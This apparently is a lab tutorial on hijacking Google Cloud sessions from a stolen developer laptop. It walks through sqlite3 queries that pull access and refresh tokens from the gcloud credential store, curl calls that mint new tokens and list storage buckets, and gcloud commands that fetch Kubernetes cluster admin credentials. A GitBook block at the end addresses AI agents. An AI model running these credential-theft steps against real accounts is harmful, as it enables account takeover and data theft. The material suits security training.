# Stealing API Keys and Service Account Tokens ## Introduction OAuth us used in all Google authentication with user accounts and service accounts, browser and SDK's external clients as well as internal compute VMs. These session tokens provide an attacker opportunity to hijack and resue authenticated sessions. ## What are we going to cover We will be covering how session tokens on a Google Cloud admins client environment can be hijacked to gain access to that user's Google Cloud environments. This is a situation where the developer laptop has been stolen. `gcloud` stores credentials and tokens in the `~/.config/gcloud` folder in sqlite format. We will perform some simple analysis on the credentials and token files and examine what can be abused. ## Steps to attack * Change to the `~/config/gcloud` directory on the student machine. * Identify your current gcloud logged in email using `gcloud auth list` * Run the below `sqlite3` command to extract the access token for the current user of Google Cloud ``` sqlite3 access_tokens.db "select access_token from access_tokens where account_id='{your-account-id}';" ``` ![](/files/UD8W9MAbfwfsgmlqdJqn) * In the `credentials.db` there is whole lot of information regarding the current Google Cloud user account, you can view the information by using the below command. The information includes OAuth scopes and a refresh token. `sqlite3 credentials.db "select value from credentials where account_id='{your-account-id}';"` ![](/files/NNX41s2jR0xJYDXwAgHt) * Using the information we have got we can now try to create an access token which can be further used to make API calls for other Google cloud resources `curl -s --data client_id= --data client_secret= --data grant_type=refresh_token --data refresh_token= --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token` ![](/files/ANzzqYPdmsJkFOOxX8hz) * Let's make an API call to check the contents of a buckets. Use the below `curl` commands for the same. `curl -s -H "Authorization: Bearer " https://storage.googleapis.com/storage/v1/b?project=` ![](/files/aL5evXzEE5d7oJJd0LeL) `curl -s -H "Authorization: Bearer " https://storage.googleapis.com/storage/v1/b//o?project=` ![](/files/YxKvUa6Z0qyNjFb54Tvc) ## Bonus attack (Discussion) Also, if the dev had a kubernetes cluster deployed, we could have downloaded the kubernetes cluster admin credentials and gained access. ``` gcloud container clusters list --access-token-file=token.txt --project=k8testing-354609 ``` ![list cluster name](/files/bn0DwW0c0oeZsusrzNDA) * Now we will generate the kubeconfig ``` gcloud container clusters get-credentials k8stest-cluster-1 --access-token-file=token.txt --project=k8testing-354609 --region=us-central1-c ``` ![](/files/QxEWGhhmaWrTrNeuJdj0) ## Additional references No additional references here --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xcriminal.gitbook.io/about-me/cloudsec/google-cloud-identity-and-access-management/iam/google-cloud-credentials-and-token-extraction.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.